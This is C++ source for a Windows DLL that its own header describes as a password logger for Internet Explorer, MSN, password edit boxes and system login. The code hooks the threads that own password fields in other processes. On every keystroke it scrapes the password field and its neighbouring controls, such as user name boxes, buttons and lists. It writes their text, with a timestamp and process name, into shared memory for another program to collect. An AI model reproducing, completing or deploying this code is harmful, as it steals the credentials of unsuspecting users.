// EdtLink.cpp : Defines the entry point for the DLL application.
//
/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/
#include "DllEdtLinkStdAfx.h"
#include "EdtLink.h"

#define _WIN32_WINNT  0x0500
#ifdef _WIN32_IE 
  #undef _WIN32_IE
  #define _WIN32_IE 0x0500
#endif

// Forward references of Posted and Sent Message Handler
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam);
LRESULT CALLBACK CallWndProcHook(int nCode, WPARAM wParam, LPARAM lParam) ;

///////////////////////////////////////////////////////////////////////////////


// Instruct the compiler to put the g_hXXXhook data variable in 
// its own data section called Shared. We then instruct the 
// linker that we want to share the data in this section 
// with all instances of this application.
#pragma data_seg("Shared")
//Post Message Hook Handle 
HHOOK g_hEditPostHook[MAX_PWD_EDIT] = 
                  {NULL, NULL, NULL, NULL, NULL, 
                   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL};    
//Send Message Hook Handle
HHOOK g_hEditSendHook[MAX_PWD_EDIT] = 
                  {NULL, NULL, NULL, NULL, NULL, 
                   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL}; 

//Tracked Edit 
HWND g_hEditWnd[MAX_PWD_EDIT] = 
                  {NULL, NULL, NULL, NULL, NULL, 
                   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL};
 
//Tracked Active Edit(Which Contents Has Never Been Spied Even Once)
HWND g_hActiveEditWnd[MAX_PWD_EDIT] = 
                  {NULL, NULL, NULL, NULL, NULL, 
                   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL,
				   NULL, NULL, NULL, NULL, NULL}; 

//Tracked Edit Thread
DWORD g_idEditThread[MAX_PWD_EDIT] = 
                  {0, 0, 0, 0, 0, 
                   0, 0, 0, 0, 0,
				   0, 0, 0, 0, 0,
				   0, 0, 0, 0, 0};      

//Debug Use File to write sth to disk
TCHAR g_szEditFilename[MAX_PATH] = {NULL};
#pragma data_seg()

// Instruct the linker to make the Shared section
// readable, writable, and shared.
#pragma comment(linker, "/section:Shared,rws")

// Nonshared variables
HINSTANCE g_hinstDll = NULL;

BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
					 )
{
    switch (ul_reason_for_call)
	{
		case DLL_PROCESS_ATTACH:
			g_hinstDll = (HINSTANCE)hModule;
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
    }
    return TRUE;
}

//Set Hook On Target Window 
BOOL WINAPI InitEditLink(HWND hEdit)
{
	//DO NOT Set Hok on the same thread Again!!!
	DWORD td = ::GetWindowThreadProcessId(hEdit, NULL);

	//Check if this thread has been hooked
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_idEditThread[i] == td) //no need to hook
		{
			//Set Hook To Previous Value
			DWORD dwIndex = InsertEditHwnd(hEdit);
			if(dwIndex == (UINT)-1) return FALSE;
            g_hEditSendHook[dwIndex] = g_hEditSendHook[i];
            g_hEditPostHook[dwIndex] = g_hEditPostHook[i];
            g_idEditThread[dwIndex] = g_idEditThread[i];
			return TRUE;
		}
	}

	//First Window On This Thread, Hook It
    DWORD dwIndex = InsertEditHwnd(hEdit);
    if(dwIndex == (UINT)-1) return FALSE;
    g_idEditThread[dwIndex] = ::GetWindowThreadProcessId(hEdit, NULL);
    
	// Install the hook on the specified thread
    g_hEditSendHook[dwIndex] = SetWindowsHookEx(WH_CALLWNDPROC,
                       (HOOKPROC) CallWndProcHook,
					   g_hinstDll, 
		               g_idEditThread[dwIndex]);

	if(g_hEditSendHook[dwIndex] == NULL) 
	{
		// Make sure that a hook has been installed.
        ::ReportErr(_T("in InitEditLink -- SetSendHook return NULL"));
		BOOL b = UnhookWindowsHookEx(g_hEditSendHook[dwIndex]);
		if(!b)
		{
			::ReportErr(_T("in InitEditLink -- SetSendHook Fail->UnsetHook Fail"));
		}
		::g_hEditWnd[dwIndex] = NULL;
        g_hEditSendHook[dwIndex] = NULL;
		g_idEditThread[dwIndex] = 0;
		return FALSE;
	}	
	
	g_hEditPostHook[dwIndex] = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc,
					       g_hinstDll, 
		                   g_idEditThread[dwIndex]);
	if(g_hEditPostHook[dwIndex] == NULL) 
	{
		// Make sure that a hook has been installed.
        ::ReportErr(_T("in InitEditLink -- SetPostHook return NULL"));

        g_hEditSendHook[dwIndex] = NULL;
		g_hEditPostHook[dwIndex] = NULL;
		g_idEditThread[dwIndex] = 0;        
		g_hEditWnd[dwIndex] = NULL;  
		return FALSE;
	}
	//current top-level edit we are looking at
	PushActiveEdit(hEdit);
    return TRUE;
}

BOOL WINAPI ExitEditLink(HWND hEdit)
{
	DWORD dwIndex = QueryEditHwndIndex(hEdit);
	if(dwIndex == (UINT)-1) return FALSE;

	DWORD tid = ::g_idEditThread[dwIndex];
	DWORD dwThreadNum = 0;
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_idEditThread[i] == tid) dwThreadNum++;
	}

	//If the thread is used by other edit, do not unhook it
	if(dwThreadNum > 1)
	{
        g_hEditWnd[dwIndex] = NULL;
        g_hEditSendHook[dwIndex] = NULL;
		g_hEditPostHook[dwIndex] = NULL;
		g_idEditThread[dwIndex] = 0;
		return TRUE;
	}

	//the last edit running on the thread ready to quit
	BOOL b =  UnhookWindowsHookEx(g_hEditSendHook[dwIndex]);
    if(!b) 
	{
        ::ReportErr(_T("in ExitEdtLink -- UnSetSendHook return NULL"));
		if(g_hEditPostHook[dwIndex])
			UnhookWindowsHookEx(g_hEditPostHook[dwIndex]);

		g_hEditWnd[dwIndex] = NULL;
        g_hEditSendHook[dwIndex] = NULL;
		g_hEditPostHook[dwIndex] = NULL;
		g_idEditThread[dwIndex] = 0;
		return FALSE;  
	}

	if(g_hEditPostHook[dwIndex])
		UnhookWindowsHookEx(g_hEditPostHook[dwIndex]);

	g_hEditWnd[dwIndex] = NULL;
    g_hEditSendHook[dwIndex] = NULL;
	g_hEditPostHook[dwIndex] = NULL;
	g_idEditThread[dwIndex] = 0;
	return TRUE;
}

/////////////////////////////////////////////////////////////////////////

//Insert hEdit into g_hEdit and return the Array Index, NOT used in Service
//Called by InitEditLink Only
DWORD InsertEditHwnd(HWND hEdit)
{
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_hEditWnd[i] == NULL)
		{
            g_hEditWnd[i] = hEdit;
			return i;
		}
	}
	return (UINT)-1;
}

//Query hEdit's index in g_hEdit, NOT used in Service
DWORD QueryEditHwndIndex(HWND hEdit)
{
	if(hEdit == NULL) return (UINT)-1;
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_hEditWnd[i] == hEdit) return i;
	}
	return (UINT)-1;
}

//When InitEdtLink, Set Active Edit, Read The Edit's sibling ASAP 
BOOL  PushActiveEdit(HWND hEdit)
{
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_hActiveEditWnd[i] == NULL)
		{
			g_hActiveEditWnd[i] = hEdit;
			return i;
		}
	}
	return FALSE;
}

HWND  PopActiveEdit(BOOL bDelete)
{
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_hActiveEditWnd[i] != NULL)
		{
			HWND h = g_hActiveEditWnd[i];
			if(bDelete) g_hActiveEditWnd[i] = NULL;
			return h;
		}
	}
	return NULL;
}

//Get Hooked Edit Number
DWORD WINAPI GetEditArrayNumber()
{
	DWORD dwRet = 0;
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_hEditWnd[i]) dwRet++;
	}
	return dwRet;
}

//Check Edit Array State????
EDTLINK_API void WINAPI CheckEditArray()
{
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(g_hEditWnd[i])
		{
			if(IsPasswordEdit(g_hEditWnd[i]))
			{
				//Do Nothing
			}
			else
			{
				g_hEditWnd[i] = NULL;
                g_hEditSendHook[i] = NULL;
				g_hEditPostHook[i] = NULL;
				g_idEditThread[i] = 0;
			}
		}
	}
	return;
}

//For multiple hook, I supoose the the dialog containing the password edit is always
//in modal state
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam) 
{
	MSG* msg = (MSG*)lParam;
	
	// Uncomment the line below to invoke the debugger on the process that just got the injected DLL.
    // ForceDebugBreak();
   
	if(PopActiveEdit(FALSE) != NULL)
	{
        HWND hWnd = msg->hwnd;
	    DWORD dwIndex = -1;
	    DWORD tid = GetWindowThreadProcessId(hWnd, NULL);
        for(int i = 0; i < MAX_PWD_EDIT; i++)
		{
			if(tid == ::g_idEditThread[i])
			{
				HWND h = PopActiveEdit(TRUE);
		        //g_hActiveEdit = NULL; //MUST !!!
		        //PopMsg(_T("BombPwdEdit in GetMsgProc"));
		        BombPwdEdit(h); //inside it, more message cause re-enter
				break;
			}
		}
	}

	//Note: WM_COMMAND is Sent to Window, not Post

    //find the hook index
	HWND hWnd = msg->hwnd;
	DWORD dwIndex = -1;
	DWORD tid = GetWindowThreadProcessId(hWnd, NULL);
	//g_hGhostChatWnd's parent is the Desktop Window
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(tid == ::g_idEditThread[i]) 
		{
			dwIndex = i;	
			break;
		}
	}
	if(dwIndex == MAX_PWD_EDIT) //shit! not found ???
	{
		//::ReportErr(_T("Edit Hook to where"));
		return 0;
	}
    return(CallNextHookEx(g_hEditPostHook[dwIndex], nCode, wParam, lParam));
}

//Note CallWndProcHook can NOT change message (from MSDN)
/*
typedef struct tagCWPSTRUCT { 
    LPARAM  lParam; 
    WPARAM  wParam; 
    UINT    message; 
    HWND    hwnd; 
} CWPSTRUCT, *PCWPSTRUCT; 
*/

//SendMessage Hook Proc
LRESULT CALLBACK CallWndProcHook(
  int nCode,      // hook code
  WPARAM wParam,  // If sent by the current thread, it is nonzero; otherwise, it is zero. 
  LPARAM lParam   // message data
)
{
	//::PopMsg(_T("CallWndProcHook"));
	CWPSTRUCT* pCwp = (CWPSTRUCT*)lParam;
    
	//Whenever User Input inside an Edit, jjjjjj...
	if(pCwp->message == WM_COMMAND && HIWORD(pCwp->wParam) == EN_CHANGE)
	{
		//PopMsg(_T("EN_CHANGE"));
		for(int i = 0; i < MAX_PWD_EDIT; i++)
		{
			if(g_hEditWnd[i] == (HWND)(pCwp->lParam))
			{
				//PopMsg(_T("EN_CHANGE in Edit"));
				//PopMsg(_T("BombPwdEdit in CallWndProcHook"));
                BombPwdEdit(g_hEditWnd[i]);
				break;
			}
		}
	}

    //find the hook index
	HWND hWnd = pCwp->hwnd;
	DWORD dwIndex = -1;
	DWORD tid = GetWindowThreadProcessId(hWnd, NULL);
	//g_hChatWnd's parent is the Desktop Window
	for(int i = 0; i < MAX_PWD_EDIT; i++)
	{
		if(tid == ::g_idEditThread[i]) 
		{
			dwIndex = i;	
			break;
		}
	}
	if(dwIndex == MAX_PWD_EDIT) //shit! where???
	{
		//::ReportErr(_T("Hook to where"));
		return 0;
	}

	if (nCode < 0) 
    {
		// just pass it on 
	    return CallNextHookEx (g_hEditSendHook[dwIndex], nCode, wParam, lParam) ;
    }  
	return CallNextHookEx (g_hEditSendHook[dwIndex], nCode, wParam, lParam) ;
}

typedef struct tagBombEditPara
{
	LPVOID  lpMem;
	LPVOID  lpdwSize;
	LPVOID  lpdwUsed;
} BombEditPara;
 
//============================================================
//	{_T("Static"), 0 }, {_T("Button"), 1 },
//	{_T("Edit"), 2 },  {_T("ListBox"), 3 },
//	{_T("ComboBox"), 4 }, {_T("RICHEDIT"), 5 },
//	{_T("ComboBoxEx32"), 6 }, {_T("SysAnimate32"), 7 },
//	{_T("SysDateTimePick32"), 8 }, {_T("SysHeader32"), 9 },
//	{_T("msctls_hotkey32"), 10 }, {_T("SysIPAddress32"), 11 },
//	{_T("SysListView32"), 12 }, {_T("SysMonthCal32"), 13 },
//	{_T("msctls_progress32"), 14 }, {_T("ReBarWindow32"), 15 },
//	{_T("RichEdit20A"), 16 }, {_T("RichEdit20W"), 17 },
//	{_T("msctls_trackbar32"), 18 }, {_T("msctls_updown32"), 19 },
//	{_T("msctls_progress32"), 20 }, {_T("msctls_statusbar32"), 21 },
//	{_T("SysTabControl32"), 22 }, {_T("ToolbarWindow32"), 23 },
//	{_T("tooltips_class32"), 24 }, {_T("SysTreeView32"), 25 },

//  ThunderCommandButton ThunderComboBox ThunderListBox ThunderTextBox
//  StatusBar20WndClass Toolbar20WndClass TabStrip20WndClass Slider20WndClass
//  ListView20WndClass TreeView20WndClass ThunderCheckBox  ThunderOptionButton
//  ThunderHScrollBar RichTextWndClass ProgressBar20WndClass ThunderFrame

//WindowsForms10.EDIT.app1 WindowsForms10.BUTTON.app1 .....

BOOL CALLBACK EnumChildProc(
  HWND hWnd,      // handle to child window
  LPARAM lParam   // application-defined value
)
{
	BombEditPara* myPara = (BombEditPara*)lParam;
	LPVOID lpMem = myPara->lpMem;
	DWORD dwSize, dwUsed;
	//get currrent MMF status data
	::CopyMemory(&dwSize, myPara->lpdwSize, sizeof(DWORD));
	::CopyMemory(&dwUsed, myPara->lpdwUsed, sizeof(DWORD));

	//cope with EDIT, LISTBOX, COMBOBOX, STATIC, BUTTON(CheckBox, RadioBox), STATIC
	TCHAR szClassName[64];
	int nRet = GetClassName(hWnd, szClassName, 64);
    if(nRet == 0) return TRUE;
	szClassName[nRet] = 0;
	BOOL bRet;
	if(::lstrcmp(szClassName, _T("Edit")) == 0 || ::lstrcmp(szClassName, _T("ThunderTextBox")) == 0)
	{
		bRet = GrabEditText(hWnd, lpMem, dwSize, dwUsed);
	}
	else if(::lstrcmp(szClassName, _T("Static")) == 0 || ::lstrcmp(szClassName, _T("ThunderFrame")) == 0)
	{
		bRet = GrabStaticText(hWnd, lpMem, dwSize, dwUsed);
	}
	else if(::lstrcmp(szClassName, _T("Button")) == 0 || ::lstrcmp(szClassName, _T("ThunderCommandButton")) == 0)
	{
		bRet = GrabButtonText(hWnd, lpMem, dwSize, dwUsed);
	}
	else if(::lstrcmp(szClassName, _T("ListBox")) == 0 || ::lstrcmp(szClassName, _T("ThunderListBox")) == 0)
	{
		bRet = GrabListBoxText(hWnd, lpMem, dwSize, dwUsed);
	}
	else if(::lstrcmp(szClassName, _T("ComboBox")) == 0 || ::lstrcmp(szClassName, _T("ThunderComboBox")) == 0)
	{
		bRet = GrabComboBoxText(hWnd, lpMem, dwSize, dwUsed);
	}
	else if(::lstrcmp(szClassName, _T("ComboBoxEx32")) == 0)
	{
		bRet = GrabComboBoxText(hWnd, lpMem, dwSize, dwUsed);
	}
	else return TRUE;
	//you can deal with ListView or TreeView with the same way...
	::CopyMemory(myPara->lpdwSize, &dwSize, sizeof(DWORD));
	::CopyMemory(myPara->lpdwUsed, &dwUsed, sizeof(DWORD));

	return bRet;
}

//hEdit is the password editbox
BOOL WINAPI BombPwdEdit(HWND hPwdEdit)
{
	//This Edit Need Parent anyway
	if(::GetParent(hPwdEdit) == NULL) return FALSE;
    BombEditPara myPara;

    HANDLE hMMF = OpenFileMapping(FILE_MAP_READ | FILE_MAP_WRITE, FALSE, g_MMF_NAME);
    if (hMMF == NULL) 
	{
		::ReportErr(_T("Open MMF Failed in BombPwdEdit"));  return FALSE;
	}

	HANDLE hWriteEvent = ::OpenEvent(EVENT_ALL_ACCESS, FALSE,g_WRITE_EVENT_MMF_NAME);
	if(hWriteEvent == NULL)
	{
		::CloseHandle(hMMF);
		::ReportErr(_T("Open Write Event Failed in BombPwdEdit"));  return FALSE;
	}

	HANDLE hReadEvent = ::OpenEvent(EVENT_ALL_ACCESS, FALSE,g_READ_EVENT_MMF_NAME);
	if(hReadEvent == NULL)
	{
		::CloseHandle(hMMF);
		::CloseHandle(hWriteEvent);
		::ReportErr(_T("Open Read Event Failed in BombPwdEdit")); return FALSE;
	}

	DWORD dwRet = ::WaitForSingleObject(hWriteEvent, MAX_WAIT);//INFINITE);
	if(dwRet == WAIT_ABANDONED)
	{
		//::ReportErr(_T("Write Wait Error")); 
		::CloseHandle(hMMF);
		::CloseHandle(hWriteEvent);
		::CloseHandle(hReadEvent);
		return FALSE;
	}
	else if(dwRet == WAIT_TIMEOUT)
	{
		//::ReportErr(_T("Write Wait Time Out")); 
		::CloseHandle(hMMF);
		::CloseHandle(hWriteEvent);
		::CloseHandle(hReadEvent);
		return FALSE;
	}
	
	::ResetEvent(hWriteEvent);

	//4 Byte total size
	//4 byte used size
	DWORD pos = 0;
	//head 4 byte to record size
	LPVOID pView = MapViewOfFile(hMMF, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
	if(pView == NULL)
	{
        ::CloseHandle(hMMF);
		::CloseHandle(hWriteEvent);
		::CloseHandle(hReadEvent);
		::ReportErr(_T("Write MapView Faield in BombPwdEdit"));
		return FALSE;
	}

	LPBYTE lpByte = (LPBYTE)pView;
	DWORD dwSize, dwUsed;
	::CopyMemory(&dwSize, lpByte, sizeof(DWORD));
	lpByte += sizeof(DWORD);
	::CopyMemory(&dwUsed, lpByte, sizeof(DWORD));
    lpByte += sizeof(DWORD);

	LPVOID lpMem = (LPVOID)lpByte; //Actual Data Head
   	//::PopMsg(_T("BombEdit dwSize %d"), dwSize);
    
	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);
    
	TCHAR sz[128];
    _stprintf(sz, _T(">>>\r\n%d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	lpByte = (LPBYTE)lpMem;
	lpByte += dwUsed;
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	//Write Process Name
	TCHAR szPath[4 * MAX_PATH]; //anyway the length is enough
    dwRet = GetModuleFileName(
           NULL,    // handle to module
           szPath,  // path buffer
           4 * MAX_PATH         // size of buffer
    );
	szPath[dwRet] = TCHAR('\0');
	TCHAR* chLastSlash = _tcsrchr(szPath, TCHAR('\\'));
	chLastSlash++;
	//PopMsg(_T("%s"), (LPCTSTR)chLastSlash);

	//$$$$$$$$$$$$$$$$$$$$$$$$$$$ //Debug Left
//	if(::lstrcmpi(chLastSlash, _T("Your Program")) == 0)
//	{
//		::UnmapViewOfFile(pView);
//	    ::CloseHandle(hMMF);
//	    ::SetEvent(hReadEvent);
//	
//	    ::CloseHandle(hWriteEvent);
//	    ::CloseHandle(hReadEvent);
//	    return TRUE;
//	}

	dwDisp = ::lstrlen((LPCTSTR)chLastSlash)*sizeof(TCHAR);
	lpByte = (LPBYTE)lpMem;
	lpByte += dwUsed;
	::CopyMemory(lpByte, chLastSlash, dwDisp);
	dwUsed += dwDisp;

    _stprintf(sz, _T("\r\n"));
	dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	lpByte = (LPBYTE)lpMem;
	lpByte += dwUsed;
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;
	
	myPara.lpMem = lpMem;
	myPara.lpdwUsed = &dwUsed;
	myPara.lpdwSize = &dwSize;
	//Enum all the sibling
    BOOL bRet = EnumChildWindows(
        ::GetParent(hPwdEdit),         // handle to parent window
        EnumChildProc,  // callback function
        (LPARAM)&myPara            // application-defined value
    );
	::CopyMemory(&dwSize, myPara.lpdwSize, sizeof(DWORD));
	::CopyMemory(&dwUsed, myPara.lpdwUsed, sizeof(DWORD));

    lpByte = (LPBYTE)pView;
	lpByte += sizeof(DWORD);
	::CopyMemory(lpByte, &dwUsed, sizeof(DWORD));
    
	::UnmapViewOfFile(pView);
	::CloseHandle(hMMF);
	::SetEvent(hReadEvent);
	
	::CloseHandle(hWriteEvent);
	::CloseHandle(hReadEvent);

	return TRUE;
}

///////////////////////////////////////////////////////////////////
//Read Contents of Controls, and Write To MMF

//Support Both EDIT and RICHEDIT
BOOL GrabEditText(HWND hEdit, LPVOID lpMem, DWORD &dwSize, DWORD &dwUsed)
{
	LPBYTE pByte = (LPBYTE)lpMem;
	pByte += dwUsed;
	LPTSTR pData = (LPTSTR)pByte;

	RECT rect;
	::GetWindowRect(hEdit, &rect);
	TCHAR sz[64];
    //Write Coordinate & Handle
    _stprintf(sz, _T("Edit (%d,%d,%d,%d) 0x%X-"), 
		rect.left, rect.top, rect.right, rect.bottom, hEdit);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(pData, sz, dwDisp);
	dwUsed += dwDisp;
	pByte += dwDisp;
    pData = (LPTSTR)pByte;

	//Note: If the control has no text, the return value is 1. 
	int lines = ::SendMessage( 
             (HWND)hEdit, // handle to destination window 
              EM_GETLINECOUNT,  // message to send
              0,          // not used; must be zero
              0);          // not used; must be zero

    //The return value will never be less than 1.
    for(int i = 0; i < lines; i++)
	{
		//Suppose A line Contains At Most 1024 characters
		TCHAR pStr[1024];
	    WORD wLen = 0x0400;
		::CopyMemory(pStr, &wLen, 2);
		
		DWORD ret = ::SendMessage( 
           (HWND) hEdit,   // handle to destination window 
            EM_GETLINE,     // message to send
           (WPARAM) i,          // line number
           (LPARAM)(LPCTSTR)pStr);   // line buffer 
        //Write text 
	    pStr[ret] = TCHAR('\r');
		pStr[ret+1] = TCHAR('\n');
        
		dwDisp = (ret+2)*sizeof(TCHAR);
        ::CopyMemory(pData, pStr, dwDisp);
		dwUsed += dwDisp;
        pByte += dwDisp;
        pData = (LPTSTR)pByte;
	}
	return TRUE;
}

BOOL GrabStaticText(HWND hStatic, LPVOID lpMem, DWORD &dwSize, DWORD &dwUsed)
{
	LPBYTE pByte = (LPBYTE)lpMem;
	pByte += dwUsed;
	LPTSTR pData = (LPTSTR)pByte;

	TCHAR sz[64];
	RECT rect;
	::GetWindowRect(hStatic, &rect);
    _stprintf(sz, _T("Static (%d,%d,%d,%d) 0x%X-"), 
		rect.left, rect.top, rect.right, rect.bottom, hStatic);

	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(pData, sz, dwDisp);
    dwUsed += dwDisp;
	pByte += dwDisp;
    pData = (LPTSTR)pByte;

	TCHAR pStr[1024];
	
	WPARAM wParam = 0x0400;
	DWORD ret = ::SendMessage( 
           (HWND) hStatic,   // handle to destination window 
           WM_GETTEXT,     // message to send
           wParam,        // buffer size in TCHAR
           (LPARAM)pStr); // buffer 
    //Write text 
	pStr[ret] = TCHAR('\r');
	pStr[ret+1] = TCHAR('\n');
        
	dwDisp = (ret+2)*sizeof(TCHAR);
    ::CopyMemory(pData, pStr, dwDisp);
	dwUsed += dwDisp;
    pByte += dwDisp;
    pData = (LPTSTR)pByte;
	return TRUE;
}

BOOL GrabButtonText(HWND hButton, LPVOID lpMem, DWORD &dwSize, DWORD &dwUsed)
{
	LPBYTE pByte = (LPBYTE)lpMem;
	pByte += dwUsed;
	LPTSTR pData = (LPTSTR)pByte;

	
	RECT rect;
	::GetWindowRect(hButton, &rect);

	TCHAR szType[64];
	LONG_PTR lStyle = ::GetWindowLongPtr(hButton, GWL_STYLE);
    LONG_PTR lStyleEx = ::GetWindowLongPtr(hButton, GWL_EXSTYLE);

	if((BS_AUTOCHECKBOX  & lStyle) == BS_AUTOCHECKBOX ||
		(BS_CHECKBOX  & lStyle) == BS_CHECKBOX)
	{
		//2-State CheckBox
		::lstrcpy(szType, _T("CheckBtn"));
		LRESULT hr = ::SendMessage(hButton, BM_GETCHECK, 0, 0);
		if(hr == BST_CHECKED)
			::lstrcat(szType, _T("<Checked>"));
		else if(hr == BST_UNCHECKED)
			::lstrcat(szType, _T("<Unchecked>"));
		else
			::lstrcat(szType, _T("<?>"));
	}
	else if((BS_AUTO3STATE & lStyle) == BS_AUTO3STATE ||
		(BS_3STATE  & lStyle) == BS_3STATE)
	{
		//3-State CheckBox
		::lstrcpy(szType, _T("3StateCheckBtn"));
		LRESULT hr = ::SendMessage(hButton, BM_GETCHECK, 0, 0);
		if(hr == BST_CHECKED)
			::lstrcat(szType, _T("<Checked>"));
		else if(hr == BST_UNCHECKED)
			::lstrcat(szType, _T("<Unchecked>"));
		else
			::lstrcat(szType, _T("<Grayed>"));
	}
	else if((BS_AUTORADIOBUTTON & lStyle) == BS_AUTORADIOBUTTON ||
		(BS_RADIOBUTTON & lStyle) == BS_RADIOBUTTON)
	{
		//Radio Button
		::lstrcpy(szType, _T("RadioBtn"));
		LRESULT hr = ::SendMessage(hButton, BM_GETCHECK, 0, 0);
		if(hr == BST_CHECKED)
			::lstrcat(szType, _T("<Checked>"));
		else if(hr == BST_UNCHECKED)
			::lstrcat(szType, _T("<Unchecked>"));
		else
			::lstrcat(szType, _T("<?>"));
	}
	else
	{
		::lstrcpy(szType, _T("Btn"));
	}

    TCHAR sz[128];
    _stprintf(sz, _T("%s(%d,%d,%d,%d) 0x%X-"), szType,
		rect.left, rect.top, rect.right, rect.bottom, hButton);
	//PopMsg(sz);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory((LPVOID)pData, sz, dwDisp);
	dwUsed += dwDisp;
	pByte += dwDisp;
    pData = (LPTSTR)pByte;
  
	//
	TCHAR pStr[1024];
	WPARAM wParam = 0x0400;
	DWORD ret = ::SendMessage( 
           (HWND) hButton,   // handle to destination window 
           WM_GETTEXT,     // message to send
           wParam,        // buffer size in TCHAR
           (LPARAM)pStr); // buffer 
    //Write text 
	pStr[ret] = TCHAR('\r');
	pStr[ret+1] = TCHAR('\n');
        
	dwDisp = (ret+2)*sizeof(TCHAR);
    ::CopyMemory(pData, pStr, dwDisp);
	dwUsed += dwDisp;
    pByte += dwDisp;
    pData = (LPTSTR)pByte;
	
	return TRUE;
}

BOOL GrabListBoxText(HWND hListBox, LPVOID lpMem, DWORD &dwSize, DWORD &dwUsed)
{
	LPBYTE pByte = (LPBYTE)lpMem;
	pByte += dwUsed;
	LPTSTR pData = (LPTSTR)pByte;

	RECT rect;
	::GetWindowRect(hListBox, &rect);

	TCHAR szType[64];
	LPTSTR szType2 = NULL;
	LONG_PTR lStyle = ::GetWindowLongPtr(hListBox, GWL_STYLE);
    LONG_PTR lStyleEx = ::GetWindowLongPtr(hListBox, GWL_EXSTYLE);

	if((LBS_MULTIPLESEL  & lStyle) == LBS_MULTIPLESEL)
	{
		//Multiple Selection ListBox
		::lstrcpy(szType, _T("ListBox<MultipleSelection-None Selection>"));
		int count = ::SendMessage(hListBox, LB_GETCOUNT,  0, 0);
		if(count != LB_ERR && count != 0)
		{
			int* pArray = new int[count];
			LRESULT hr = ::SendMessage(hListBox, LB_GETSELITEMS, 
				(WPARAM)count, (LPARAM)(LPVOID)pArray);
			if(hr != LB_ERR && (int)hr > 0)
			{
				::lstrcpy(szType, _T("ListBox<MultipleSelection-"));
				DWORD dwLen = ::lstrlen(szType) + 16;
				dwLen += 5 * (int)hr;
				szType2 = new TCHAR[dwLen];
				if(szType2)
				{
					for(int i = 0; i < (int)hr; i++)
					{
						TCHAR szIndex[7];
                        _stprintf(szIndex, _T("%d,"), pArray[i]);
					    ::lstrcat(szType2, szIndex);
					}
					::lstrcat(szType2, _T(" Selected>"));
				}				
			}
		}
	}
	else
	{
		//Single Selection ListBox
		LRESULT hr = ::SendMessage(hListBox, LB_GETCURSEL, 0, 0);
		if(hr == LB_ERR)
		{
			::lstrcpy(szType, _T("ListBox<SingleSelection-None Selected>"));
		}
		else
		{
			_stprintf(szType, _T("ListBox<SingleSelection-%d Selected>"), hr);
		}
	}

	LPTSTR sz;
	if(szType2 == NULL)
	{
		sz = new TCHAR[128];
		_stprintf(sz, _T("%s(%d,%d,%d,%d) 0x%X-\r\n"), szType,
		    rect.left, rect.top, rect.right, rect.bottom, hListBox);
	}
	else
	{
		int len = ::lstrlen(szType2);
		sz = new TCHAR[len + 64];
		_stprintf(sz, _T("%s(%d,%d,%d,%d) 0x%X-\r\n"), szType2,
		    rect.left, rect.top, rect.right, rect.bottom, hListBox);
		delete szType2;
	}
	//PopMsg(sz);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(pData, sz, dwDisp);

	delete sz;

    dwUsed += dwDisp;
	pByte += dwDisp;
    pData = (LPTSTR)pByte;

	TCHAR pStr[1024];
	int count = ::SendMessage( 
        (HWND)hListBox, // handle to destination window 
        LB_GETCOUNT,  // message to send
        0,          // not used; must be zero
        0);          // not used; must be zero
    //The return value will never be less than 1.
	if(count == LB_ERR || count == 0)
	{
		return TRUE;
	}

    for(int i = 0; i < count; i++)
	{
		int len;
        len = ::SendMessage( 
              (HWND) hListBox,    // handle to destination window 
              LB_GETTEXTLEN,      // message to send
              (WPARAM)i,          // item index
              (LPARAM)0);         // not used; must be zero
		if(len == LB_ERR || len >= 1024) continue;
		
		DWORD ret = ::SendMessage( 
              (HWND) hListBox,        // handle to destination window 
              LB_GETTEXT,             // message to send
              (WPARAM) i,             // item index
              (LPARAM)(LPTSTR)pStr);  // buffer for items (LPTSTR)
        if(ret == LB_ERR) continue;   
        pStr[ret] = TCHAR('\r');
		pStr[ret+1] = TCHAR('\n');
        
		dwDisp = (ret+2)*sizeof(TCHAR);
        ::CopyMemory(pData, pStr, dwDisp);
		dwUsed += dwDisp;
        pByte += dwDisp;
        pData = (LPTSTR)pByte;
	}
	return TRUE;
}


